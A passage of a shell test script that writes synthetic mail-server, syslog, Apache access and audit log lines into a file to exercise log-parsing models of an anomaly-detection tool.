$LOGFILE echo "Feb 28 11:39:35 mail-2 dovecot: auth: Error: auth worker: Aborted PASSV request for marjory: Worker process died unexpectedly" >> $LOGFILE echo "Feb 28 11:39:35 mail-2 dovecot: auth-worker(2233): Fatal: Error reading configuration: Timeout reading config from /var/run/dovecot/config" >> $LOGFILE echo "Feb 28 11:39:35 mail-2 dovecot: master: Error: service(auth-worker): command startup failed, throttling for 2 secs" >> $LOGFILE echo 'Feb 28 11:39:46 mail-2 HORDE: [imp] Login success for marjory (192.168.10.18) to {imap://localhost/} [pid 1764 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Feb 28 17:18:23 mail-2 HORDE: [imp] Message sent to marcelle@mail.insect.com, merlene@mail.insect.com from les (192.168.10.18) [pid 9596 on line 970 of "/var/www/mail.insect.com/imp/lib/Compose.php"]' >> $LOGFILE echo 'Feb 28 20:01:48 mail-2 HORDE: [imp] FAILED LOGIN for violet (192.168.10.18) to {imap://localhost/} [pid 14794 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Mar 1 06:25:38 mail HORDE: [imp] [status] Could not open mailbox "INBOX". [pid 999 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 1 06:27:56 mail HORDE: [imp] [getSyncToken] IMAP error reported by server. [pid 1127 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Feb 28 12:12:54 mail-2 HORDE: [horde] Login success for dorie to horde (192.168.10.18) [pid 2272 on line 163 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 28 12:13:00 mail-2 HORDE: [horde] User marjory logged out of Horde (192.168.10.18) [pid 2988 on line 106 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 28 17:07:07 mail-2 HORDE: [horde] FAILED LOGIN for marcelle to horde (192.168.10.98) [pid 8517 on line 198 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Mar 1 18:22:40 mail HORDE: [imp] [login] Authentication failed. 
[pid 12890 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 4 18:55:05 mail HORDE: [turba] PHP ERROR: finfo_file(): Empty filename or path [pid 11642 on line 166 of "/usr/share/php/Horde/Mime/Magic.php"]' >> $LOGFILE echo 'Mar 4 18:50:51 mail HORDE: [horde] PHP ERROR: Cannot modify header information - headers already sent [pid 11019 on line 0 of "Unknown"]' >> $LOGFILE echo 'Mar 4 18:01:23 mail HORDE: Guest user is not authorized for Horde (Host: 192.168.10.81). [pid 4815 on line 324 of "/usr/share/php/Horde/Registry.php"]' >> $LOGFILE echo 'Mar 4 18:10:08 mail HORDE: PHP ERROR: rawurlencode() expects parameter 1 to be string, array given [pid 6556 on line 302 of "/usr/share/php/Horde/Url.php"]' >> $LOGFILE # missing model/service/horde/horde/free_msg - no log found! echo "Feb 28 12:39:02 mail-0 CRON[11260]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)" >> $LOGFILE echo "Feb 28 06:25:01 mail-1 CRON[27486]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "Feb 28 15:42:36 mail-1 auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=marcelino rhost=127.0.0.1 user=marcelino" >> $LOGFILE echo "Mar 1 03:09:18 mail-0 systemd[1]: Starting Clean php session files..." >> $LOGFILE echo "Mar 1 03:09:19 mail-0 systemd[1]: Started Clean php session files." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Starting Cleanup of Temporary Directories..." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Started Cleanup of Temporary Directories." >> $LOGFILE echo "Mar 2 06:37:52 mail systemd[1]: Starting Daily apt upgrade and clean activities..." >> $LOGFILE echo "Mar 2 06:37:53 mail systemd[1]: Started Daily apt upgrade and clean activities." >> $LOGFILE echo "Mar 2 12:30:18 mail systemd[1]: Starting Daily apt download activities..." 
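>> "$LOGFILE"
# Tail of the SyslogParsingModel fixture: systemd unit state changes, a kernel
# stack-trace fragment, auditd/augenrules start-up noise, rsyslog HUP, freshclam
# and dhclient. All sample data is synthetic AIT-LDS test-bed output (RFC 1918
# addresses, test-bed host names). $LOGFILE is quoted throughout so a path with
# spaces or glob characters cannot split into several words or expand.
echo "Mar 2 12:30:19 mail systemd[1]: Started Daily apt download activities." >> "$LOGFILE"
echo "Mar 3 06:29:00 mail systemd[1]: Starting Security Auditing Service..." >> "$LOGFILE"
echo "Mar 3 06:29:00 mail systemd[1]: Started Security Auditing Service." >> "$LOGFILE"
echo "Mar 4 06:29:05 mail systemd[1]: Stopping Security Auditing Service..." >> "$LOGFILE"
echo "Mar 4 06:29:05 mail systemd[1]: Stopped Security Auditing Service." >> "$LOGFILE"
echo "Mar 5 06:25:35 mail systemd[1]: Reloading The Apache HTTP Server." >> "$LOGFILE"
echo "Mar 5 06:25:35 mail systemd[1]: Reloaded The Apache HTTP Server." >> "$LOGFILE"
echo "Feb 28 11:52:32 mail-2 systemd[1]: Mounting Arbitrary Executable File Formats File System..." >> "$LOGFILE"
# NOTE(review): the "Mounted" entry is dated one day BEFORE its "Mounting"
# counterpart (Feb 27 vs Feb 28); the AIT-LDSv2 arm below dates both Feb 28.
# Left untouched because this fixture only checks parsing, not ordering --
# confirm whether the skew is intentional.
echo "Feb 27 11:52:32 mail-2 systemd[1]: Mounted Arbitrary Executable File Formats File System." >> "$LOGFILE"
echo "Feb 28 13:56:59 mail-2 systemd[1]: apt-daily.timer: Adding 6h 4min 46.743459s random time." >> "$LOGFILE"
# missing model/service/systemd/service - no log found!
# NOTE(review): the empty "[]" before "? ret_from_fork" looks like a stripped
# kernel address; confirm against the upstream fixture.
echo "Feb 28 07:24:02 mail-0 kernel: [47678.309129] [] ? ret_from_fork+0x57/0x70" >> "$LOGFILE"
echo "Mar 5 06:29:07 mail augenrules[17378]: backlog_wait_time 0" >> "$LOGFILE"
echo "Mar 5 06:29:07 mail auditd[17377]: dispatch error reporting limit reached - ending report notification." >> "$LOGFILE"
echo "Mar 5 06:29:07 mail auditd: audit log is not writable by owner" >> "$LOGFILE"
echo "Mar 4 06:29:05 mail audispd: No plugins found, exiting" >> "$LOGFILE"
echo 'Mar 3 06:29:01 mail liblogging-stdlog: [origin software="rsyslogd" swVersion="8.24.0" x-pid="480" x-info="http://www.rsyslog.com"] rsyslogd was HUPed' >> "$LOGFILE"
echo "Mar 1 09:25:16 mail freshclam[22090]: Sun Mar 1 09:25:16 2020 -> bytecode.cvd is up to date (version: 331, sigs: 94, f-level: 63, builder: anvilleg)" >> "$LOGFILE"
echo "Mar 1 07:26:09 mail dhclient[418]: DHCPREQUEST of 192.168.10.21 on eth0 to 192.168.10.2 port 67" >> "$LOGFILE"
echo "Mar 1 00:59:38 mail-2 dhclient[387]: DHCPACK of 192.168.10.21 from 192.168.10.2" >> "$LOGFILE"
echo "Feb 28 21:12:42 mail-2 dhclient[418]: bound to 192.168.10.21 -- renewal in 36807 seconds." >> "$LOGFILE"
;;
# AIT-LDSv1 variant of the syslog fixture: the same dovecot / HORDE / CRON /
# pam_unix / systemd / auditd / dhclient sample set as SyslogParsingModel, with
# the Feb 28 entries re-dated to Feb 29 (2020 is a leap year, see the Suricata
# fixture's 2020-02-29 timestamps). The first write uses ">" so the arm always
# starts from an empty file; every later line appends.
# The samples include events a detector should care about -- FAILED LOGIN,
# pam_unix authentication failure, the audit service being stopped, "audit log
# is not writable by owner" -- but this fixture only exercises the parser;
# nothing here asserts that they are flagged.
# NOTE(review): several dovecot fields (user=, session=) carry no value in these
# lines although dovecot normally prints an angle-bracketed token there; confirm
# against the upstream fixture that the user/session sub-models are still
# exercised, or the parser may never see the populated form.
# NOTE(review): this arm duplicates SyslogParsingModel line-for-line apart from
# the dates; the three syslog arms will drift unless the sample list is factored
# into a shared helper.
SyslogParsingModelAIT-LDSv1)
echo "Feb 29 00:01:41 mail-0 dovecot: imap(kelsey): Logged out in=79 out=875" > "$LOGFILE"
echo "Mar 1 06:25:38 mail dovecot: imap(lino): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:38]" >> "$LOGFILE"
echo "Feb 29 00:01:44 mail-0 dovecot: imap(della): Error: file_dotlock_create(/var/mail/della) failed: Permission denied (euid=1013(della) egid=1013(della) missing +w perm: /var/mail, we're not in group 8(mail), dir owned by 0:8 mode=0775) (set mail_privileged_group=mail)" >> "$LOGFILE"
echo "Mar 1 06:25:41 mail dovecot: imap(idella): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:41]" >> "$LOGFILE"
echo "Mar 4 14:14:36 mail dovecot: imap-login: Disconnected (auth failed, 2 attempts in 12 secs): user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> "$LOGFILE"
echo "Mar 4 18:43:05 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.185, lip=192.168.10.177, session=" >> "$LOGFILE"
echo "Mar 4 13:51:48 mail dovecot: imap-login: Disconnected (disconnected before auth was ready, waited 0 secs): user=<>, rip=192.168.10.18, lip=192.168.10.21, session=<+KO9uAeg4sPAqAoS>" >> "$LOGFILE"
echo "Mar 4 18:43:59 mail dovecot: imap-login: Login: user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, mpid=11475, secured, session=<8ZitzQugnrh/AAAB>" >> "$LOGFILE"
echo "Feb 29 11:39:45 mail-0 dovecot: imap-login: Error: anvil: Anvil queries timed out after 5 secs - aborting queries" >> "$LOGFILE"
echo "Feb 29 09:15:59 mail-1 dovecot: imap-login: Warning: Auth process not responding, delayed sending initial response (greeting): user=<>, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> "$LOGFILE"
echo "Feb 29 11:39:35 mail-2 dovecot: auth: Error: auth worker: Aborted PASSV request for marjory: Worker process died unexpectedly" >> "$LOGFILE"
echo "Feb 29 11:39:35 mail-2 dovecot: auth-worker(2233): Fatal: Error reading configuration: Timeout reading config from /var/run/dovecot/config" >> "$LOGFILE"
echo "Feb 29 11:39:35 mail-2 dovecot: master: Error: service(auth-worker): command startup failed, throttling for 2 secs" >> "$LOGFILE"
# HORDE webmail lines: single-quoted because the payload itself contains
# double-quoted PHP file paths.
echo 'Feb 29 11:39:46 mail-2 HORDE: [imp] Login success for marjory (192.168.10.18) to {imap://localhost/} [pid 1764 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> "$LOGFILE"
echo 'Feb 29 17:18:23 mail-2 HORDE: [imp] Message sent to marcelle@mail.insect.com, merlene@mail.insect.com from les (192.168.10.18) [pid 9596 on line 970 of "/var/www/mail.insect.com/imp/lib/Compose.php"]' >> "$LOGFILE"
echo 'Feb 29 20:01:48 mail-2 HORDE: [imp] FAILED LOGIN for violet (192.168.10.18) to {imap://localhost/} [pid 14794 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> "$LOGFILE"
echo 'Mar 1 06:25:38 mail HORDE: [imp] [status] Could not open mailbox "INBOX". [pid 999 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> "$LOGFILE"
echo 'Mar 1 06:27:56 mail HORDE: [imp] [getSyncToken] IMAP error reported by server. [pid 1127 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> "$LOGFILE"
echo 'Feb 29 12:12:54 mail-2 HORDE: [horde] Login success for dorie to horde (192.168.10.18) [pid 2272 on line 163 of "/var/www/mail.insect.com/login.php"]' >> "$LOGFILE"
echo 'Feb 29 12:13:00 mail-2 HORDE: [horde] User marjory logged out of Horde (192.168.10.18) [pid 2988 on line 106 of "/var/www/mail.insect.com/login.php"]' >> "$LOGFILE"
echo 'Feb 29 17:07:07 mail-2 HORDE: [horde] FAILED LOGIN for marcelle to horde (192.168.10.98) [pid 8517 on line 198 of "/var/www/mail.insect.com/login.php"]' >> "$LOGFILE"
echo 'Mar 1 18:22:40 mail HORDE: [imp] [login] Authentication failed. [pid 12890 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> "$LOGFILE"
echo 'Mar 4 18:55:05 mail HORDE: [turba] PHP ERROR: finfo_file(): Empty filename or path [pid 11642 on line 166 of "/usr/share/php/Horde/Mime/Magic.php"]' >> "$LOGFILE"
echo 'Mar 4 18:50:51 mail HORDE: [horde] PHP ERROR: Cannot modify header information - headers already sent [pid 11019 on line 0 of "Unknown"]' >> "$LOGFILE"
echo 'Mar 4 18:01:23 mail HORDE: Guest user is not authorized for Horde (Host: 192.168.10.81). [pid 4815 on line 324 of "/usr/share/php/Horde/Registry.php"]' >> "$LOGFILE"
echo 'Mar 4 18:10:08 mail HORDE: PHP ERROR: rawurlencode() expects parameter 1 to be string, array given [pid 6556 on line 302 of "/usr/share/php/Horde/Url.php"]' >> "$LOGFILE"
# missing model/service/horde/horde/free_msg - no log found!
echo "Feb 29 12:39:02 mail-0 CRON[11260]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)" >> "$LOGFILE"
echo "Feb 29 06:25:01 mail-1 CRON[27486]: pam_unix(cron:session): session opened for user root by (uid=0)" >> "$LOGFILE"
echo "Feb 29 15:42:36 mail-1 auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=marcelino rhost=127.0.0.1 user=marcelino" >> "$LOGFILE"
echo "Mar 1 03:09:18 mail-0 systemd[1]: Starting Clean php session files..." >> "$LOGFILE"
echo "Mar 1 03:09:19 mail-0 systemd[1]: Started Clean php session files." >> "$LOGFILE"
echo "Mar 1 18:26:18 mail systemd[1]: Starting Cleanup of Temporary Directories..." >> "$LOGFILE"
echo "Mar 1 18:26:18 mail systemd[1]: Started Cleanup of Temporary Directories." >> "$LOGFILE"
echo "Mar 2 06:37:52 mail systemd[1]: Starting Daily apt upgrade and clean activities..." >> "$LOGFILE"
echo "Mar 2 06:37:53 mail systemd[1]: Started Daily apt upgrade and clean activities." >> "$LOGFILE"
echo "Mar 2 12:30:18 mail systemd[1]: Starting Daily apt download activities..." >> "$LOGFILE"
echo "Mar 2 12:30:19 mail systemd[1]: Started Daily apt download activities." >> "$LOGFILE"
echo "Mar 3 06:29:00 mail systemd[1]: Starting Security Auditing Service..." >> "$LOGFILE"
echo "Mar 3 06:29:00 mail systemd[1]: Started Security Auditing Service." >> "$LOGFILE"
echo "Mar 4 06:29:05 mail systemd[1]: Stopping Security Auditing Service..." >> "$LOGFILE"
echo "Mar 4 06:29:05 mail systemd[1]: Stopped Security Auditing Service." >> "$LOGFILE"
echo "Mar 5 06:25:35 mail systemd[1]: Reloading The Apache HTTP Server." >> "$LOGFILE"
echo "Mar 5 06:25:35 mail systemd[1]: Reloaded The Apache HTTP Server." >> "$LOGFILE"
echo "Feb 29 11:52:32 mail-2 systemd[1]: Mounting Arbitrary Executable File Formats File System..." >> "$LOGFILE"
echo "Feb 29 11:52:32 mail-2 systemd[1]: Mounted Arbitrary Executable File Formats File System." >> "$LOGFILE"
echo "Feb 29 13:56:59 mail-2 systemd[1]: apt-daily.timer: Adding 6h 4min 46.743459s random time." >> "$LOGFILE"
# missing model/service/systemd/service - no log found!
echo "Feb 29 07:24:02 mail-0 kernel: [47678.309129] [] ? ret_from_fork+0x57/0x70" >> "$LOGFILE"
echo "Mar 5 06:29:07 mail augenrules[17378]: backlog_wait_time 0" >> "$LOGFILE"
echo "Mar 5 06:29:07 mail auditd[17377]: dispatch error reporting limit reached - ending report notification." >> "$LOGFILE"
echo "Mar 5 06:29:07 mail auditd: audit log is not writable by owner" >> "$LOGFILE"
echo "Mar 4 06:29:05 mail audispd: No plugins found, exiting" >> "$LOGFILE"
echo 'Mar 3 06:29:01 mail liblogging-stdlog: [origin software="rsyslogd" swVersion="8.24.0" x-pid="480" x-info="http://www.rsyslog.com"] rsyslogd was HUPed' >> "$LOGFILE"
echo "Mar 1 09:25:16 mail freshclam[22090]: Sun Mar 1 09:25:16 2020 -> bytecode.cvd is up to date (version: 331, sigs: 94, f-level: 63, builder: anvilleg)" >> "$LOGFILE"
echo "Mar 1 07:26:09 mail dhclient[418]: DHCPREQUEST of 192.168.10.21 on eth0 to 192.168.10.2 port 67" >> "$LOGFILE"
echo "Mar 1 00:59:38 mail-2 dhclient[387]: DHCPACK of 192.168.10.21 from 192.168.10.2" >> "$LOGFILE"
echo "Feb 29 21:12:42 mail-2 dhclient[418]: bound to 192.168.10.21 -- renewal in 36807 seconds." >> "$LOGFILE"
;;
# AIT-LDSv2 variant: identical sample set to SyslogParsingModel (Feb 28 dates),
# differing from it only in that the systemd "Mounted" entry is dated Feb 28 like
# its "Mounting" counterpart. Same caveats as the AIT-LDSv1 arm above: parsing
# fixture only, synthetic test-bed data, empty user=/session= fields to confirm.
SyslogParsingModelAIT-LDSv2)
echo "Feb 28 00:01:41 mail-0 dovecot: imap(kelsey): Logged out in=79 out=875" > "$LOGFILE"
echo "Mar 1 06:25:38 mail dovecot: imap(lino): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:38]" >> "$LOGFILE"
echo "Feb 28 00:01:44 mail-0 dovecot: imap(della): Error: file_dotlock_create(/var/mail/della) failed: Permission denied (euid=1013(della) egid=1013(della) missing +w perm: /var/mail, we're not in group 8(mail), dir owned by 0:8 mode=0775) (set mail_privileged_group=mail)" >> "$LOGFILE"
echo "Mar 1 06:25:41 mail dovecot: imap(idella): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:41]" >> "$LOGFILE"
echo "Mar 4 14:14:36 mail dovecot: imap-login: Disconnected (auth failed, 2 attempts in 12 secs): user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> "$LOGFILE"
echo "Mar 4 18:43:05 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.185, lip=192.168.10.177, session=" >> "$LOGFILE"
echo "Mar 4 13:51:48 mail dovecot: imap-login: Disconnected (disconnected before auth was ready, waited 0 secs): user=<>, rip=192.168.10.18, lip=192.168.10.21, session=<+KO9uAeg4sPAqAoS>" >> "$LOGFILE"
echo "Mar 4 18:43:59 mail dovecot: imap-login: Login: user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, mpid=11475, secured, session=<8ZitzQugnrh/AAAB>" >> "$LOGFILE"
echo "Feb 28 11:39:45 mail-0 dovecot: imap-login: Error: anvil: Anvil queries timed out after 5 secs - aborting queries" >> "$LOGFILE"
echo "Feb 28 09:15:59 mail-1 dovecot: imap-login: Warning: Auth process not responding, delayed sending initial response (greeting): user=<>, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> "$LOGFILE"
echo "Feb 28 11:39:35 mail-2 dovecot: auth: Error: auth worker: Aborted PASSV request for marjory: Worker process died unexpectedly" >> "$LOGFILE"
echo "Feb 28 11:39:35 mail-2 dovecot: auth-worker(2233): Fatal: Error reading configuration: Timeout reading config from /var/run/dovecot/config" >> "$LOGFILE"
echo "Feb 28 11:39:35 mail-2 dovecot: master: Error: service(auth-worker): command startup failed, throttling for 2 secs" >> "$LOGFILE"
echo 'Feb 28 11:39:46 mail-2 HORDE: [imp] Login success for marjory (192.168.10.18) to {imap://localhost/} [pid 1764 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> "$LOGFILE"
echo 'Feb 28 17:18:23 mail-2 HORDE: [imp] Message sent to marcelle@mail.insect.com, merlene@mail.insect.com from les (192.168.10.18) [pid 9596 on line 970 of "/var/www/mail.insect.com/imp/lib/Compose.php"]' >> "$LOGFILE"
echo 'Feb 28 20:01:48 mail-2 HORDE: [imp] FAILED LOGIN for violet (192.168.10.18) to {imap://localhost/} [pid 14794 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> "$LOGFILE"
echo 'Mar 1 06:25:38 mail HORDE: [imp] [status] Could not open mailbox "INBOX". [pid 999 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> "$LOGFILE"
echo 'Mar 1 06:27:56 mail HORDE: [imp] [getSyncToken] IMAP error reported by server. [pid 1127 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> "$LOGFILE"
echo 'Feb 28 12:12:54 mail-2 HORDE: [horde] Login success for dorie to horde (192.168.10.18) [pid 2272 on line 163 of "/var/www/mail.insect.com/login.php"]' >> "$LOGFILE"
echo 'Feb 28 12:13:00 mail-2 HORDE: [horde] User marjory logged out of Horde (192.168.10.18) [pid 2988 on line 106 of "/var/www/mail.insect.com/login.php"]' >> "$LOGFILE"
echo 'Feb 28 17:07:07 mail-2 HORDE: [horde] FAILED LOGIN for marcelle to horde (192.168.10.98) [pid 8517 on line 198 of "/var/www/mail.insect.com/login.php"]' >> "$LOGFILE"
echo 'Mar 1 18:22:40 mail HORDE: [imp] [login] Authentication failed. [pid 12890 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> "$LOGFILE"
echo 'Mar 4 18:55:05 mail HORDE: [turba] PHP ERROR: finfo_file(): Empty filename or path [pid 11642 on line 166 of "/usr/share/php/Horde/Mime/Magic.php"]' >> "$LOGFILE"
echo 'Mar 4 18:50:51 mail HORDE: [horde] PHP ERROR: Cannot modify header information - headers already sent [pid 11019 on line 0 of "Unknown"]' >> "$LOGFILE"
echo 'Mar 4 18:01:23 mail HORDE: Guest user is not authorized for Horde (Host: 192.168.10.81). [pid 4815 on line 324 of "/usr/share/php/Horde/Registry.php"]' >> "$LOGFILE"
echo 'Mar 4 18:10:08 mail HORDE: PHP ERROR: rawurlencode() expects parameter 1 to be string, array given [pid 6556 on line 302 of "/usr/share/php/Horde/Url.php"]' >> "$LOGFILE"
# missing model/service/horde/horde/free_msg - no log found!
echo "Feb 28 12:39:02 mail-0 CRON[11260]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)" >> "$LOGFILE"
echo "Feb 28 06:25:01 mail-1 CRON[27486]: pam_unix(cron:session): session opened for user root by (uid=0)" >> "$LOGFILE"
echo "Feb 28 15:42:36 mail-1 auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=marcelino rhost=127.0.0.1 user=marcelino" >> "$LOGFILE"
echo "Mar 1 03:09:18 mail-0 systemd[1]: Starting Clean php session files..." >> "$LOGFILE"
echo "Mar 1 03:09:19 mail-0 systemd[1]: Started Clean php session files." >> "$LOGFILE"
echo "Mar 1 18:26:18 mail systemd[1]: Starting Cleanup of Temporary Directories..." >> "$LOGFILE"
echo "Mar 1 18:26:18 mail systemd[1]: Started Cleanup of Temporary Directories." >> "$LOGFILE"
echo "Mar 2 06:37:52 mail systemd[1]: Starting Daily apt upgrade and clean activities..." >> "$LOGFILE"
echo "Mar 2 06:37:53 mail systemd[1]: Started Daily apt upgrade and clean activities." >> "$LOGFILE"
echo "Mar 2 12:30:18 mail systemd[1]: Starting Daily apt download activities..." >> "$LOGFILE"
echo "Mar 2 12:30:19 mail systemd[1]: Started Daily apt download activities." >> "$LOGFILE"
echo "Mar 3 06:29:00 mail systemd[1]: Starting Security Auditing Service..." >> "$LOGFILE"
echo "Mar 3 06:29:00 mail systemd[1]: Started Security Auditing Service." >> "$LOGFILE"
echo "Mar 4 06:29:05 mail systemd[1]: Stopping Security Auditing Service..." >> "$LOGFILE"
echo "Mar 4 06:29:05 mail systemd[1]: Stopped Security Auditing Service." >> "$LOGFILE"
echo "Mar 5 06:25:35 mail systemd[1]: Reloading The Apache HTTP Server." >> "$LOGFILE"
echo "Mar 5 06:25:35 mail systemd[1]: Reloaded The Apache HTTP Server." >> "$LOGFILE"
echo "Feb 28 11:52:32 mail-2 systemd[1]: Mounting Arbitrary Executable File Formats File System..." >> "$LOGFILE"
echo "Feb 28 11:52:32 mail-2 systemd[1]: Mounted Arbitrary Executable File Formats File System." >> "$LOGFILE"
echo "Feb 28 13:56:59 mail-2 systemd[1]: apt-daily.timer: Adding 6h 4min 46.743459s random time." >> "$LOGFILE"
# missing model/service/systemd/service - no log found!
echo "Feb 28 07:24:02 mail-0 kernel: [47678.309129] [] ? ret_from_fork+0x57/0x70" >> "$LOGFILE"
echo "Mar 5 06:29:07 mail augenrules[17378]: backlog_wait_time 0" >> "$LOGFILE"
echo "Mar 5 06:29:07 mail auditd[17377]: dispatch error reporting limit reached - ending report notification." >> "$LOGFILE"
echo "Mar 5 06:29:07 mail auditd: audit log is not writable by owner" >> "$LOGFILE"
echo "Mar 4 06:29:05 mail audispd: No plugins found, exiting" >> "$LOGFILE"
echo 'Mar 3 06:29:01 mail liblogging-stdlog: [origin software="rsyslogd" swVersion="8.24.0" x-pid="480" x-info="http://www.rsyslog.com"] rsyslogd was HUPed' >> "$LOGFILE"
echo "Mar 1 09:25:16 mail freshclam[22090]: Sun Mar 1 09:25:16 2020 -> bytecode.cvd is up to date (version: 331, sigs: 94, f-level: 63, builder: anvilleg)" >> "$LOGFILE"
echo "Mar 1 07:26:09 mail dhclient[418]: DHCPREQUEST of 192.168.10.21 on eth0 to 192.168.10.2 port 67" >> "$LOGFILE"
echo "Mar 1 00:59:38 mail-2 dhclient[387]: DHCPACK of 192.168.10.21 from 192.168.10.2" >> "$LOGFILE"
echo "Feb 28 21:12:42 mail-2 dhclient[418]: bound to 192.168.10.21 -- renewal in 36807 seconds." >> "$LOGFILE"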
>> $LOGFILE ;; AminerParsingModel) sudo cp ./demo/aminer/jsonConverterHandler-demo-config.py /tmp/demo-config.py sudo ./demo/aminer/aminerDemo.sh > $LOGFILE sed -i -e 1,2d $LOGFILE sed -i -e "/Generating data for the LinearNumericBinDefinition histogram report../d" $LOGFILE sed -i -e "/Generating data for the ModuloTimeBinDefinition histogram report../d" $LOGFILE sed -i "/^CPU Temp: /d" $LOGFILE sed -i "/^first$/d" $LOGFILE sed -i "/^second$/d" $LOGFILE sed -i "/^third$/d" $LOGFILE sed -i "/^fourth$/d" $LOGFILE cat >> $CONFIG_PATH < $LOGFILE echo '127.0.0.1 - - [01/May/2020:21:44:53 +0200] "GET /phpmyadmin/sql.php?server=1&db=seconlineportaldb&table=CONTRACT&pos=0 HTTP/1.1" 200 5326 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0"' >> $LOGFILE echo '127.0.0.1 - - [01/Apr/2020:09:19:23 +0200] "GET /phpmyadmin/themes/pmahomme/img/b_drop.png HTTP/1.1" 304 180 "http://localhost/phpmyadmin/phpmyadmin.css.php?nocache=6340393753ltr&server=1" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0"' >> $LOGFILE echo '111.222.333.123 HOME user1 [01/Feb/1998:01:08:39 -0800] "GET /bannerad/ad.htm HTTP/1.0" 200 198 "http://www.referrer.com/bannerad/ba_intro.htm" "Mozilla/4.01 (Macintosh; I; PPC)"' >> $LOGFILE echo '::1 - - [31/Mar/2020:15:14:28 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1c (internal dummy connection)"' >> $LOGFILE echo '::1 - - [17/May/2015:10:05:03 +0000] "-" 200 203023' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:55 +0000] "POST /nag/task/save.php HTTP/1.1" 200 5220 "-" "-"' >> $LOGFILE echo 'www.google.com - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE ;; AudispdParsingModel) echo "audispd: type=ADD_GROUP msg=audit(1525173583.598:2104): pid=45406 uid=0 auid=0 ses=160 
subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding group acct=\"raman\" exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=pts/1 res=success'" > $LOGFILE echo "audispd: type=ADD_USER msg=audit(1525173583.670:2105): pid=45406 uid=0 auid=0 ses=160 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding user id=1003 exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=pts/1 res=success'" >> $LOGFILE echo "audispd: type=ADD_USER msg=audit(1525173583.677:2106): pid=45406 uid=0 auid=0 ses=160 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding home directory id=1003 exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=pts/1 res=success'" >> $LOGFILE echo 'type=ANOM_ABEND msg=audit(1459467717.181:189187): auid=4294967295 uid=977 gid=2010 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 pid=40239 comm="radiusd" reason="memory violation" sig=11' >> $LOGFILE echo 'audispd: type=ANOM_ABEND msg=audit(1459370041.594:534): auid=10000 uid=0 gid=0 ses=6 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 pid=3697 comm="sshd" reason="memory violation" sig=6' >> $LOGFILE echo "audispd: type=ANOM_ACCESS_FS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_ADD_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_AMTU_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: 